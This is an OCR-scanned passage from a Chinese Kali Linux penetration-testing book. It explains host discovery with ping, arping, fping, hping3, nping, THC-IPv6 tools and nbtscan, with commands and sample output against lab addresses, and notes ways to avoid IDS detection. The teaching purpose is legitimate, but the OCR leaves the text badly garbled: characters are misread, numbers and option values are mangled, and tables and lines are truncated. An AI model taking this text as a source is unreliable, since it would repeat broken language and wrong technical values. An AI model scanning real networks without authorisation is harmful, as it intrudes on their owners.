防御 系统 时 ， 我 们 同样 需要 使 渗透 测试 的 行动 不 被 发 现 。 如 采 客 户 没 有 
这 种 要 求 ， 束 没有 必要 进行 隐匿 的 测试 了 。 





5.2.1 ping 

在 检查 主机 是 否 在 线 的 工具 中 ，ping 可 能 是 最 著名 的 程序 了 。 该 工 
具 问 目标 主机 发 送 ICMP 协 议 (Internet Control Message Protocol) 的 echo 
request 数据 包 。 如 果 目 标 主机 在 线 有 旦 允许 受理 ping 请 求 ， 那 么 目标 主机 
将 回复 ICMP echo reply 数 据 包 。 

ICMP 协 议 的 echo request (ik) Mecho reply (回复 ) 消息 只 是 
ICMP 协 议 的 两 种 类 型 的 消息 。 如 需 了 解 ICMP 协 议 的 其 他 类 型 消 轧 ， 请 
参见 





https://en.wikipedia.org/wiki/Internet_Control_Message_Protocol#Control_m 
Kali Linux 的 菜单 里 没有 列 出 ping 程序 。 所 以 我 们 要 在 终端 中 输入 
ping 命令 并 配置 好 它 的 选项 。 
如 图 5.1 所 示 ， 我 们 可 以 在 ping 指 令 之 后 直接 指定 目标 地 址 。 








oot@kali:~# ping 192.168.56.102 

PING 192.168.56.102 (192.168.56.102) 56(84) bytes of data. 

64 bytes from 192.168.56.102: icmp req-1 ttl=64 time=1.03 ms 
b4 bytes from 192.168.56.102: icmp req-2 ttl-64 time=0.421 ms 
54 bytes from 192.168.56.102: icmp_req=3 ttl=64 time=0.428 ms 
64 bytes from 192.168.56.102: icmp req-4 ttl=64 time=0.503 ms 
= bytes from 192.168.56.102: icmp_req=5 ttl=64 time=0.510 ms 
4 bytes from 192.168.56.102: icmp_req=6 ttl=64 time=0.741 ms 
64 bytes from 192.168.56.102: icmp_req=7 ttl=64 time=0.503 ms 
64 bytes from 192.168.56.102: icmp_req=8 ttl=64 time=0.771 ms 
$ bytes from 192.168.56.102: icmp_req=9 ttl=64 time=0.477 ms 
4 bytes from 192.168.56.102: icmp_req=10 ttl=64 time=0.522 ms 





--- 192.168.56.102 ping statistics --- 
10 packets transmitted, 10 received, 0% packet loss, time 9000ms 
rtt min/avg/max/mdev = 0.421/0.590/1.033/0.188 ms 


图 5.1 

在 Kali Linux 里 ， 默 认 情 况 下 在 按 下 Ctrl-C 之 前 ，ping 指令 会 一 直 
Bi T: 

ping 有 很 多 的 选项 ， 最 常用 的 是 有 下 面 这 些 。 

e-ccount: 发 送 echo request 数据 包 的 总 量 。 

e -I interface address: 设置 源 地 址 或 网 络 接 口 。 该 参数 可 以 是 IP 地 
址 (例如 192.168.56.102) 或 网 卡 设备 的 名 称 《〈《 例 如 eth0) 。 如 采 您 要 
ping IPv6 链 路 本 地 地 址 ， 那 么 必须 指定 这 个 选项 。 

e -s packet size: 每 个 数据 包 的 包 大 小 《〈 字 节 数 ) 。 默 认 值 是 56。 
再 算 上 IPv4 中 8 字 节 的 ICMP 包 头 ， 默 认 情况 下 发 送 的 数据 包 会 是 64 字 节 
的 数据 包 。 

假如 您 在 进行 内 部 渗透 测试 项 目 ， 客 户 会 给 您 拉 好 网 线 以 便于 您 访 
问 他 们 的 内 网 。 他 们 还 会 给 您 目标 服务 器 的 IP 地 址 。 

在 全 面 测试 之 前 ， 第 一 件 事情 就 是 要 确定 您 是 否 可 以 从 本 机 访问 到 
目标 服务 器 。 此 时 可 以 使 用 ping 指 令 。 

假如 目标 主机 的 IP 地 址 是 192.168.56.102， 您 的 电脑 的 IP 地 址 是 
192.168.56.101。 在 测试 是 否 可 以 访问 到 目标 主机 时 ， 可 使 用 下 述 指 

















ping -c 1 192.168.56.102 
ping 指 令 的 目标 主机 参数 ， 可 以 是 IP 地 址 ， 也 可 以 是 主机 名 。 
上 述 指 令 的 返回 结果 如 图 5.2 所 示 。 


root@kali:~# ping -c 1 192.168.56.102 
PING 192.168.56.102 (192.168.56.102) 56(84) bytes of data. 
64 bytes from 192.168.56.102: icmp req-1 ttl=64 time-1.32 ms 





--- 192.168.56.102 ping statistics --- 
1 packets transmitted, 1 received, 0% packet loss, time Oms 
rtt min/avg/max/mdev = 1.326/1.326/1.326/0.000 ms 


图 5.2 
上 述 信息 表明 : ping 指 令 只 回 目 标 主 机 《了 P 地 址 为 192.168.56.102 ) 
发 送 了 1 个 ICMP echo request; 发 送 请 求 的 主机 CIP 地 址 为 
192.168.56.101) 也 只 收 到 了 1 个 ICMP echo reply; 请 求 和 回复 之 间 的 往 
返 时 间 是 1.326ms; 期 间 没 有 丢失 数据 包 。 
我 们 观察 一 下 本 机 发 送 和 接受 的 数据 。 我 们 使 用 带 有 网 络 协议 分 析 
功能 的 Wireshatk 程 序 在 主机 上 捕获 数据 包 ， 可 看 到 如 图 5.3 所 示 的 情 











No. Time Source Destination Protocol Length Info 
98 Echo (ping) request id-0x0c78, seq-1/256, ttl-64 
98 Echo d-O0x0c78, seq-1/256, ttl=6 


ping) reply 2 





图 5.3 
从 中 可 以 看 出 ， 我 们 自己 的 主机 (192.168.56.101) 向 目标 主机 
(192.168.56.102) 发 送 了 一 个 ICMP echo request 数 据 包 。 因 为 目标 主机 

在 线 且 允许 受理 ICMP echo request 数 据 包 ， 它 同 我 们 的 主机 发 送 回 ICMP 
echo reply 数 据 包 。 

10.4 节 将 详细 介绍 Wireshark 程 序 。 

如 果 目 标 主机 使 用 的 是 IPv6 地 址 ， 例 如 fe80::a00:27ff:fe43:1518， 
您 可 以 使 用 ping6 程 序 检 测 它 是 否 在 线 。 您 需要 指定 -[I 选 项， 设 定 发 送 数 


据 包 的 本 地 连接 。 
# ping6 -c 1 fe80::a00:27ff:fe43:1518 -Ieth0 
PING fe80::a00:27ff:fe43:1518(fe80::a00:27ff:fe43:1518) from 
fe80::a00:27ff:fe1c:5122 eth0: 56 data bytes 
64 bytes from fe80::a00:27ff:fe43:1518: icmp_seq=1 ttl=64 time=4.63 


--- fe80::a00:27ff:fe43:1518 ping statistics -- 

1 packets transmitted, 1 received, 0% packet loss, time Oms 
rtt min/avg/max/mdev = 4.633/4.633/4.633/0.000 ms 
ping6 指 令 的 通信 过 程 如 图 5.4 所 示 。 





从 上 面 输出 可 以 看 出 ，ping6 程序 使 用 的 是 ICMPv6 协议 的 
ICMPrequest 和 reply 数 据 包 。 

如 需 屏 蔽 ping 请 求 的 数据 包 ， 可 在 防火 增 里 配置 ICMP echo request 
的 白 名 单 ， 并 屏蔽 来 自 其 他 IP 地址 的 ICMP echo request 数据 包 。 


5.2.2 arping 


arping 是 在 局 域 网 中 使 用 ARP (Address Resolution Protocol) 请 求 
判断 目标 主机 是 否 在 线 的 工具 。 您 可 以 用 IP 地 址 或 MAC 地 址 作为 它 的 测 
试 目标 。 

因为 arping 程 序 工 作 于 OSI 模 型 中 的 第 二 层 ，ARP 协 议 的 数据 包 无 法 
通过 路 由 器 和 网 关 ， 所 以 它 只 能 检测 本 地 局 域 网 络 中 的 主机 。 

如 需 司 动 arping 程 序 ， 可 在 终端 中 使 用 下 述 命令 。 

#arping 

该 指令 显示 所 有 的 选项 及 使 用 方法 。 











我 们 使 用 arping 程 序 判 断 某 MAC 地 址 的 主机 是 否 在 线 。 

# arping 192.168.56.102 -c 1 

ARPING 192.168.56.102 

60 bytes from 08:00:27:43:15:18  (192.168.56.102):  index-0 
time-518.223usec 

--- 192.168.56.102 statistics -- 


1 packets transmitted, 1 packets received, 096 unanswered (0 extra) 
上 述 指令 检测 MAC 地 址 为 08:00:27:43:15:18 的 主机 是 否 在 线 。 





我 们 使 用 Wireshark 观 察 arping 运 行 期 间 的 网 络 数据 〈 见 图 5.5) 。 


No. Time Source Destination Protocol Length Info 


1 0.000000000 08:00:27:1c:51:22  ff:ff:ff:fF:fT:ff ARP 42 Who has 192.168.56.102? Tell 192.168.56.101 
2 0.001643000  08:00:27:43:15:18 08:00:27:1c:51:22 ARP 60 192.168.56.102 1s at 08:00:27:43:15:18 


图 5.5 

可 从 图 5.5 中 看 出 ， 本 机 的 网 卡 (MAC 地 址 为 08:00:27:1c:51:22) 发 
送 了 ARP 广 播 ( 接 受 方 MAC 地 址 为 ff:ff:ff:ff:ff:ff) ， 询 问 192.168.56.102 
的 MAC 地 址 。 如 果 这 个 IP 地 址 存在 ， 该 主机 将 其 MAC 地 址 
(08:00:27:43:15:18) 通过 ARP 协 议 进 行 回复 ;， 即 返回 图 5.5 中 第 2 个 数据 
Fil, 

如 果 没 有 任何 一 台 主 机 占用 指定 的 IP 地 址 ， 我 们 也 不 会 受到 ARP 协 
议 的 回复 数据 ， 如 图 5.6 所 示 。 











Source Destination Protocol Length Info 


1 0.000000000 08:00:27: 1¢:51:22  ff:ff:ff:ff:fT:ff ARP 42 Who has 192.168.56.1037 Tell 192.168.56.101 
2 1.002377000  08:00:27:1c:51:22 ff ff: ff: ff: ff: ff ARP 42 Who has 192.168.56.103? Tell 192.168.56.101 


图 5.6 
基于 以 上 特性 ，arping 程 序 还 常常 用 于 判断 某 个 了 地址 是 否 被 同一 
个 局 域 网 内 的 主机 占用 。 假 如 您 的 主机 通常 使 用 192.168.56.101 这 个 IP 地 
址 ， 某 天 您 想 要 换 一 个 IP 地 址 。 那 么 ， 在 更 换 IP 地 址 之 前 ， 应 当 检 查访 
IP 地 址 是 否 被 其 他 主机 占用 了 。 
此 时 可 以 使 用 下 述 arping 指 令 检测 192.168.56.102 是 否 被 他 人 占用 。 





# arping -d -i ethO 192.168.56.102 -c 2 

# echo $? 

1 

如 果 返 回 值 是 1， 则 说 明 192.168.56.102 这 个 IP 已 经 被 占用 了 。 如 果 
返回 值 是 9， 则 说 明 该 IP 没 有 被 占用 。 

与 ping ”程序 相 比 ，fping ”可 以 同时 问 多 个 主机 发 送 ping (ICMP 
echo) 请 求 。 您 可 以 在 命令 行 中 指定 多 个 目标 主机 ， 也 可 以 在 茶 个 文件 
里 指定 需要 被 检测 的 主机 。 

默认 模式 下 ，fping 程序 通过 目标 主机 的 回复 来 判断 该 主机 是 人 否 在 
线 。 如 果 目 标 主 机 发 送 了 回应 ， 该 主机 将 会 被 标记 为 alive《〈 在 线 ) : 如 
果 主 机 在 一 段 时 间 内 (超时 或 超过 尝试 次 数 ) 没有 进行 响应 ， 该 主机 则 
会 被 标记 为 unreachable (不 可 访问 ) 。 默 认 情 况 下 ， fping 将 尝试 向 每 
个 目标 发 送 三 次 ICMP echo 数据 包 。 

如 需 使 用 fping 程 序 ， 可 在 终端 中 执行 下 述 指令 。 

#fping -h 

上 述 指令 将 显示 程序 的 所 有 选项 及 使 用 方法 。 

下 面 将 介绍 fping 程 序 的 几 种 不 同 用 法 。 

° 如 果 需 要 同时 检测 地 址 为 192.168.1.1、192.168.1.100 和 
192.168.1.107 的 主机 是 人 否 在 线 ， 我 们 可 以 使 用 下 述 指令 。 

#fping 192.168.1.1 192.168.1.100 192.168.1.107 

上 述 指令 的 返回 结果 如 下 。 

192.168.1.1 is alive 

192.168.1.107 is alive 

ICMP Host Unreachable from 192.168.1.112 for ICMP Echo sent to 

192.168.1.100 














ICMP Host Unreachable from 192.168.1.112 for ICMP Echo sent to 

192.168.1.100 

ICMP Host Unreachable from 192.168.1.112 for ICMP Echo sent to 

192.168.1.100 

192.168.1.100 is unreachable 

e 如 果 不 想 逐 IP 地 指定 目标 主机 ， 我 们 可 以 指定 目标 主机 的 列 
表 。 假 设 我 们 知道 192.168.56.0 这 个 网 段 里 有 需要 检测 的 目标 主机 ， 就 
可 以 直接 使 用 -g 选 项 《生成 列表 ) 对 整个 网 段 进行 检测 。 

# fping -g 192.168.56.0/24 

上 述 指令 的 返回 结果 如 下 。 

192.168.56.101 is alive 

192.168.56.102 is alive 

ICMP Host Unreachable from 192.168.56.102 for ICMP Echo sent to 
192.168.56.2 

ICMP Host Unreachable from 192.168.56.102 for ICMP Echo sent to 
192.168.56.3 

ICMP Host Unreachable from 192.168.56.102 for ICMP Echo sent to 
192.168.56.4 

ICMP Host Unreachable from 192.168.56.102 for ICMP Echo sent to 
192.168.56.5 

ICMP Host Unreachable from 192.168.56.102 for ICMP Echo sent to 
192.168.56.6 


192.168.56.252 is unreachable 
192.168.56.253 is unreachable 
192.168.56.254 is unreachable 
e 如 需 改 变 探 测 目标 主机 的 重 试 次 数 ， 则 可 在 指令 之 中 使 用 -r 选项 











(retry limit) 。 默 认 情 况 下 ， 重 试 次 数 是 3 次 。 


计 ) 


#fping -r 1 -g 192.168.1.1 192.168.1.10 
上 述 指令 的 返回 结果 如 下 。 
192.168.1.1 is alive 

192.168.1.10 is alive 

192.168.1.2 is unreachable 


192.168.1.9 is unreachable 
e 如 需 查 看 多 个 目标 的 统计 结果 ， 可 以 使 用 -s 选项 (打印 累积 统 


o 








#fping -s www.yahoo.com www.google.com www.msn.com 
上 述 指令 的 返回 结果 如 下 。 
www.google.com is alive 
www.yahoo.com is alive 
www.msn.com is unreachable 

3 targets 

2 alive 

1 unreachable 

0 unknown addresses 

4 timeouts (waiting for response) 

6 ICMP Echos sent 

2 ICMP Echo Replies received 

0 other ICMP received 
51.6 ms (min round trip time) 
231 ms (avg round trip time) 
411 ms (max round trip time) 


4.150 sec (elapsed real time) 


5.2.4 hping3 

hping3 程 序 是 命令 行 下 的 网 络 数据 包 生 成 和 分 析 工 具 。 在 TCP/IP 测 
试 和 安全 测试 里 ， 例 如 在 端口 扫描 、 防 火 墙 规则 测试 、 网 络 性 能 测试 
时 ， 都 可 以 使 用 这 个 程序 生成 自 定义 的 网 络 数据 包 ， 从 而 进行 相应 测 
rte 

hping3 的 研发 团队 在 官方 网 站 上 Chttpz//wiki.hping.org/25) 说 明了 
它 的 主要 用 途 : 

e 测试 防火 墙 规则 ; 

e 测试 入 侵 检 测 系 统 /IDS; 

e 测试 TCP/IP 模式 的 安全 漏洞 。 

如 需 司 动 hping3 程 序 ， 可 在 终端 中 输入 hping3 指 令 。 

您 可 以 通过 命令 行 、 互 动 界面 、 脚 本 的 方式 执行 hping3。 

在 不 指定 任何 参数 的 情况 下 ， 直 接 运 行 hping3 将 向 TCP 的 0 号 端口 发 
送 空 数据 。 

如 需 改 变通 信 协 议 ， 可 参照 下 述 表 格 更 改 相 应 选项 。 











编号 选项 缩写 选项 全 称 描 xh 
1 -0 --raw-ip 发 送 原始 他 包 
2 -1 --icmp 发 送 ICMP 包 
3 -2 --udp KGL UDP 包 
4 -8 ==scan 进入 扫描 模式 
5 -9 --listen 进入 监听 模式 


在 发 送 TCP 数 据 包 时 ， 我 们 可 以 不 设置 任何 TCP 标 识 ( 默 认 情 
况 ) ， 还 可 以 参考 下 述 表格 指定 特定 TCP 标 识 。 


编 号 z 项 标识 名 称 





1 =S syn 

2 -A ack 

3 -R rst 

4 =F fin 

5 =P psh 

6 -U urg 

7 -X xmas: iX'É fin. urg, psh 
8 =Y ymas 





这 个 程序 有 下 面 几 种 不 同 的 使 用 方法 。 

e 如 果 要 向 192.168.56.101 发 送 1 个 ICMP echo 请 求 ， 就 要 设置 -1 选 
项 (使 用 ICMP 协 议 ) 和 -c 1 选项 (发 送 1 次 ) 。 

hping3 -1 192.168.56.101 -c 1 

上 述 指令 的 返回 结果 如 图 5.7 所 示 。 
root@kali:~# hping3 -1 192.168.56.101 -c 1 


HPING 192.168.56.101 (ethO 192.168.56.101): icmp mode set, 28 headers + 0 data bytes 
Len=46 ip=192.168.56.101 ttl-64 id=33099 icmp seq-0 rtt=9.0 ms 








- 192.168.56.101 hping statistic --- 
1 packets transmitted, 1 packets received, 0% packet loss 
round-trip min/avg/max - 9.0/9.0/9.0 ms 





图 5.7 
在 图 5.7 中 ， 我 们 注意 到 目标 主机 在 线 ， 它 回复 了 ICMP echo 请 
要 验证 这 一 结果 ， 我 们 可 用 tcpdump 程 序 捕获 网 络 数据 ， 结 果 如 图 
5.8 所 示 。 


20 Q - 









图 5.8 
可 见 目标 主机 的 确 发 送 了 ICMP echo 回复 数据 包 。 
e 除了 命令 行 方式 之 外 ， 我 们 可 以 直接 输入 hping3， 进 入 它 的 互动 
界面 。 您 将 会 看 到 提示 符 ， 可 在 此 使 用 Tcl 指 令 。 
如 需 了 解 Ta 的 详细 指令 ， 请 参见 : 


http://www. invece.org/tclwise/ 

http://wiki.tcl.tk/ 

要 实现 前 一 个 例子 的 功能 ， 我 们 可 以 使 用 下 述 Tal 脚 本 。 

hping send {ip(daddr=192.168.56.101)+icmp(type=8,code=0) } 

新 建 一 个 终端 窗口 ， 然 后 使 用 下 述 指令 接收 目标 服务 器 的 啊 应 。 





hpingrecv eth0 
在 此 之 后 ， 我 们 在 其 他 终端 窗口 里 使 用 上 述 Tcl 脚 本 ， 具 体 情况 如 
图 5.9 所 示 。 





Iroot@kali:~# hping3 
hping3» hping recv ethO 





ip(ihl-20x0,ver-0x0,tos-0x00,totlen-0,id-0,fragoff-0,mf-O,df-0,rf-O,ttl-0,proto-0,cksum 
=0x0000, saddr=0 .0.0.0,daddr=0.0.0.0) 





图 5.9 
e 您 还 可 以 使 用 hping3 检验 防火 墙 规则 。 假 设 您 的 防火 墙 规则 如 


o 接受 ACCEPT) 所 有 到 TCP 22 端口 的 数据 ; 

o 接受 所 有 现存 Cestablished) 连接 ; 

o EF (DROP) 其 他 数据 包 。 

验证 防火 墙 规则 时 ， 可 以 使 用 hping3 程序 发 送 ICMP echo 请 求 。 
hping3 -1 192.168.56.101 -c 1 

上 述 指令 的 返回 结果 如 下 。 

HPING 192.168.56.101 (eth0 192.168.56.101): icmp mode set, 28 
headers + 0 data bytes 

--- 192.168.56.101 hping statistic -- 

1 packets transmitted, 0 packets received, 100% packet loss 
round-trip min/avg/max = 0.0/0.0/0.0 ms 

可 见 目标 主机 没有 对 我 们 的 ping 进 行 啊 应 。 

如 图 5.10 所 示 ， 我 们 向 目标 主机 的 TCP 22 端口 发 送 一 个 带 有 SYN 





标识 的 TCP &. 

root@kali:~# hping3 192.168.56.101 -c 1 -S -p 22 -s 6060 

HPING 192.168.56.101 (ethO 192.168.56.101): S set, 40 headers + 0 data bytes 

Len=46 ip=192.168.56.101 ttl=64 DF id=0 sport=22 flags=SA seq=0 win=5840 rtt=2.5 ms 


- 192.168.56.101 hping statistic --- 
1 packets transmitted, 1 packets received, 0% packet loss 
round-trip min/avg/max = 2.5/2.5/2.5 ms 








图 5.10 
上 述 信息 表明 : 目标 主机 接受 了 刚才 我 们 发 送 到 22 端 口 的 带 SYN 标 
识 的 TCP 包 。 
然后 ， 我 们 测试 它 的 UDP 22 端口 〈 见 图 5.11) 。 


root@kali:~# hping3 -2 192.168.56.101 -c I -S -p 22 -s 6060 
HPING 192.168.56.101 (ethO 192.168.56.101): udp mode set, 28 headers + © data bytes 





- 192.168.56.101 hping statistic --- 
l packets transmitted, 0 packets received, 100% packet loss 
round-trip min/avg/max = 0.0/0.0/0.0 ms 





图 5.11 
根据 图 5.11， 我 们 可 确定 目标 主机 的 防火 墙 不 接受 到 22 端 口 的 UDP 
数据 包 。hping3 的 功能 很 多 。 但 是 本 章 只 简单 介绍 了 hping3 的 一 小 部 分 
功能 。 如 采 您 需要 详细 了 解 这 个 程序 ， 请 参见 hping3 的 官方 文件 : 
http:/wiki.hping.org。 





nping 人 允许 用 户 发 送 多 种 协议 (TCP、UDP、ICMP 和 ARP 协 议 ) 的 
数据 包 。 您 可 以 调整 协议 头 中 的 字段 ， 例 如 可 设置 TCP 和 UDP 的 源 端 口 
和 目的 端口 。nping 和 其 他 类 似 工具 的 区 别 ， 如 nping 程 序 和 ping 程 序 之 
间 的 区 别 相 似 ，nping 可 以 探测 多 个 主机 的 多 个 端 口 。 

此 外 ， 它 可 以 像 ping 程序 一 样 发 送 ICMP echo 请 求 。nping 还 可 以 
用 于 对 网 络 进行 压力 测试 、ARP 中 毒 、DoS 攻 击 。 

在 Kali Linux 中 ，nping 程序 是 Nmap 程序 包 的 一 部 分 。 

nping 文 持 多 种 探测 模式 ， 其 对 应 的 具体 参数 如 下 。 


编号 模式 选项 说 有明 
; --tep-connect 基础 的 tcp-connect 功能 
2 --tcp TCP 模式 
: --udp UDP 模式 
j --icmp ICMP 模式 默认 模式 ) 
2 --arp ARP/RARP 模式 
6 --tr traceroute 模式 〈 仅 与 TCP/UDP/ICMP 模式 兼容 ) 


在 编写 本 书 时 ， 还 不 能 通过 Kali Linux 的 图 形 化 菜单 启动 nping 程 
序 。 所 以 您 得 在 终端 中 执行 nping 命 令 才 能 启动 它 。 该 命令 将 显示 它 的 


使 用 方法 和 选项 介绍 。 





如 需 向 多 个 目标 主机 (192.168.56.100、192.168.56.101 和 
192.168.56.102) 发 送 ICMP echo 请 求 ， 可 使 用 下 述 指 令 。 


nping -c 1 192.168.56.100-102 


上 述 指 令 的 返回 结果 如 图 5.12 所 示 。 





Starting Nping 0.6.25 ( http://nmap.org/nping ) at 


Statistics for host 192.168.56.100: 

| Probes Sent: 1 | Revd: 6 | Lost: 1 (100.009) 

| Max rtt: N/A | Min rtt: N/A | Avg rtt: N/A 
Statistics for host 192.168.56.101: 

| Probes Sent: 1 | Revd: 8 | Lost: 1 (100.00$) 

|_ Max rtt: N/A | Min rtt: N/A | Avg rtt: N/A 
Statistics for host 192.168.56.102: 

| Probes Sent: 1 | Rcvd: 1 | Lost: O (0.009) 

| Max rtt: 1.461ms | Min rtt: 1.461ms | Avg rtt: 
Raw packets sent: 3 (84B) | Rcvd: 1 (46B) | Lost: 
Tx time: 2.00769s | Tx bytes/s: 41.84 | Tx pkts/s: 
Rx time: 2.00856s | Rx bytes/s: 22.90 | Rx pkts/s: 





我 们 可 以 根据 这 个 结果 判断 ， 

在 目标 主机 不 啊 应 ICMP echo 
主机 开放 的 TCP 端 口 发 送 。 ”TCP 
5.13) 。 

如 果 我 们 要 向 192.168.56.102 


SENT (0.0087s) ICMP 192.168.56.101 > 192.168.56.100 Echo request (type=8/code=0) ttL=64 id=32821 iplen=28 
SENT (1.0109s) ICMP 192.168.56.101 > 192.168.56.101 Echo request (type-8/code-0) ttl=64 id=32821 iplen-28 
SENT (2.0134s) ICMP 192.168.56.101 > 192.168.56.102 Echo request (type=8/code=0) ttl=64 id=32821 iplen-28 
RCVD (2.0153s) ICMP 192.168.56.102 > 192.168.56.101 Echo reply (type=G/code=0) ttl-64 id-62113 iplen=28 


Nping done: 3 IP addresses pinged in 2.02 seconds 


2013-06-28 20:48 WIT 


1.461ms 
2 (66.67%) 
1.49 
0.50 





图 5.12 
只 有 192.168.56.102 响 应 了 我 们 的 请 


请 求 数 据 包 的 情况 下 ， 我 们 可 以 同 该 
SYN 数据 包 检 验 它 是 否 在 线 〈 见 图 


主机 的 22 端口 (-p 22) 发 送 1 次 Cc 


1) TCP (-tcp) 数据 包 ， 可 使 用 下 述 指令 : 

nping --tcp -c 1 -p 22 192.168.56.102 

当然 ， 您 得 自己 猜测 哪个 端口 是 开放 端口 。 我 们 建议 您 从 常规 端口 
开始 测试 ， 即 21、222、23、25、80、443 和 8443 端 口 。 


上 述 指令 的 运行 结果 如 图 5.14 所 示 。 
root@kali:~# nping -c 1 192.168.56.102 





Starting Nping 0.6.40 ( http://nmap.org/nping ) at 2013-11-08 12:36 WIT 
SENT (0.0036s) ICMP [192.168.56.101 > 192.168.56.102 Echo request (type=8/code=0 
) id=40235 seq=1] IP [ttl=64 id=59056 iplen=28 ] 


Max rtt: N/A | Min rtt: N/A | Avg rtt: N/A 
Raw packets sent: 1 (28B) | Rcvd: © (0B) | Lost: 1 (100.00%) 


Nping done: 1 IP address pinged in 1.01 seconds 
[5.13 
root@kali:~# nping --tcp -c 1 -p 22 192.168.56.102 





Starting Nping 0.6.40 ( http://nmap.org/nping ) at 2013-11-08 12:38 WIT 

SENT (0.0030s) TCP 192.168.56.101:10561 > 192.168.56.102:22 S ttL=64 id-18944 ip 
len=40 seq=1823950621 win=1480 

RCVD (0.0043s) TCP 192.168.56.102:22 > 192.168.56.101:10561 SA ttl=64 id-0 iplen 
=44 seq=793586661 win=5840 <mss 1460> 


Max rtt: 1.122ms | Min rtt: 1.122ms | Avg rtt: 1.122ms 
Raw packets sent: 1 (40B) | Rcvd: 1 (46B) | Lost: © (0.00%) 


Nping done: 1 IP address pinged in 1.00 seconds 
图 5.14 


根据 这 个 结果 ， 可 知 该 主机 啊 应 了 我 们 发 送 到 22 端 口 的 数据 包 ， 所 
以 可 以 判断 目标 主机 〈192.168.56.102) 在 线 。 


5.2.6 alive6 


如 有 果 您 需要 检测 IPv6 中 联 入 了 哪些 主机 ， 肯 定 不 应 该 扫描 整个 网 
络 。 因 为 IPv6 的 地 址 空间 太 大 了 。 您 可 能 已 经 发 现 IPv6 主 机 的 网 段 是 64 
位 的 。 这 意味 着 如 有 果 进 行 网 段 扫 描 ， 扫 描 次 数 就 至 少 要 有 2 的 64 次 方 。 
很 明显 ， 在 现实 世界 中 进行 IPv6 的 网 段 扫描 不 太 现 实 。 

幸运 的 是 ， 有 一 种 名 为 ICMPv6 Neighbor Discovery (邻居 发 现 ) 的 
网 络 协 议 。 该 协议 允许 IPv6 主 机 接 入 本 地 链 路 系统 ， 并 根据 局 域 网 内 其 

















他 IPv6 主 机 的 地 址 自动 配置 自己 的 地 址 。 简 单 的 说 ， 您 可 以 使 用 这 个 协 
议 发 现 同 网 段 内 在 线 的 主机 。 

alive6 程序 可 以 发 送 ICMPv6 的 检测 数据 包 ， 并 能 处 理 网 络 上 的 啊 
应 。 这 个 程序 是 THC-IPv6 Attack Toolkit 的 一 部 分 。 它 的 研发 人 员 是 
The Hackers Choice 小 组 (http://freeworld.thc.org/thc-ipv6/) 的 Van 
Hauser. 

可 以 在 终端 中 直接 输入 alive6 来 启动 它 。 这 将 显示 它 的 使 用 方法 。 

假设 您 想 要 在 IPv6 局 域 网 内 查找 在 线 的 IPv6 主 机 ， 在 您 使 用 eth0 接 
入 这 个 网 络 的 情况 下 ， 您 可 以 使 用 下 述 指令 。 

alive6 -p ethO 

该 指令 的 返回 结果 如 下 。 

Alive: fe80::a00:27ff:fe43:1518 [ICMP echo-reply] 

Scanned 1 address and found 1 system alive 

如 果 不 希 望 其 他 主机 通过 这 种 方式 探测 到 上 自己 的 IPv6 主 机 ， 可 以 通 
过 ip6tables 指 令 屏 蔽 ICMPvV6 的 echo 请 求 。 

ip6tables -A INPUT —-p ipv6-icmp —-type icmpv6-type 128 -j DROP 

目标 主机 使 用 了 这 条 指令 之 后 ， 就 无 法 通过 这 种 方式 检测 到 它 了 
〈 见 图 5.15) 。 
root@kali:~# alive6 -p ethO 








canned 1 address and found O systems alive 





图 5.15 


5.2.7 detect-new-ip6 
这 个 程序 可 以 在 IPve 的 网 络 里 检测 到 新 加 入 网 络 的 主机 。 它 也 是 
THC 一 IPv6 Attack Toolkit 的 一 个 程序 。 
可 以 在 终端 中 直接 输入 detect-new-ipv6 来 启动 它 。 这 将 显示 它 的 使 





用 方法 。 
此 处 举 个 简单 的 例子 : 我 们 要 发 现 加 入 网 络 的 IPv6 主 机 。 
detect-new-ip6 eth0 
上 述 指令 的 返回 结果 如 下 。 
Started ICMP6 DAD detection (Press Control-C to end) ... 
Detected new ip6 address: fe80::a00:27ff:fe43:1518 





5.2.8 passive_discovery6 

如 果 需 要 通过 网 络 监 听 的 方式 找到 主机 的 IPv6 地 址 ， 可 使 用 这 个 
程序 。 它 是 由 The Hackers Choice 小 组 (http://freeworld.thc.org/thc- 
ipv6/) 的 Van Hauser 开 发 的 THC-IPv6 Attack Tookit 里 的 一 个 程序 。 使 用 
这 个 程序 可 以 避免 被 IDS 检测 出 来 。 

可 以 在 终端 中 直接 输入 passive_discovery6 来 启动 它 ， 这 将 显示 它 的 
使 用 方法 。 

如 果 要 在 网 卡 eth0 上 进行 监听 ， 可 使 用 下 述 指令 。 

passive discovery6 ethO 

上 述 指令 的 运行 结果 如 图 5.16 所 示 。 








root@kali:~# passive discovery6 eth0 

Started IPv6 passive system detection (Press Control-C to end) 
Detected: fe80::31ad:1227:d1d3:a002 

Detected: fe80::a00:27ff:fe43:1518 





图 5.16 
这 个 程序 只 是 在 监听 过 程 中 筛选 ARP 请 求 和 ARP 回 复 ， 然 后 进行 相 
应 的 分 析 。 在 刚才 的 例子 里 ，passive_discovery6 发 现 了 两 个 IPv6 地 址 ， 
这 两 个 地 址 如 下 所 示 。 
e fe80::31ad:1227:d1d3:a002 
e fe80::a00:27ff:fe43:1518 


5.2.9 nbtscan 


如 果 在 内 网 渗透 测试 中 审计 Windows 系 统 ， 您 需要 首先 获取 主机 的 
NetBIOS 信 息 。 最 常用 的 工具 就 是 nbtscan。 

这 个 工具 可 以 将 相应 主机 IP 地 址 、NetBIOS 计 算 机 名 、 可 用 服务 、 
登录 用 户 名 和 MAC 地 址 整理 为 报告 。 如 需 采 用 NetBIOS 协 议 访 问 目标 主 
机 的 NetBIOS 服 务 ( 例 如 网 络 共 享 )， 就 需要 掌握 目标 主机 的 NetBIOS 
名 称 。 这 个 工具 将 会 产生 大 量 的 网 络 流量 ， 而 且 很 可 能 被 目标 主机 记录 
TELS TS 

如 需 了 解 NetBIOS 报 告 中 每 个 服务 的 功能 ， 可 在 微软 知识 库 〈URL 
地 址 为 http://support.microsoft.com/kb/163409) 里 查询 NetBIOS 服 务 名 称 
的 第 16 个 字符 〈 即 NetBIOS 后 级 )。 

可 以 在 终端 中 直接 输入 nbtscan 来 启动 它 。 

如 需 搜 索 局 域 网 (192.168.1.0/24)〉 内 各 个 主机 的 NetBIOS 名 称 ， 可 
使 用 下 述 指令 。 

nbtscan 192.168.1.1-254 

该 指令 的 返回 结果 如 下 。 

Doing NBT name scan for addresses from 192.168.1.1-254 

IP address NetBIOS Name Server User MAC address 

















192.168.1.81 PC-001 <server> <unknown> 
00:25:9c:9f:b0:96 
192.168.1.90 PC-003 «server» «unknown»? 
00:00:00:00:00:00 


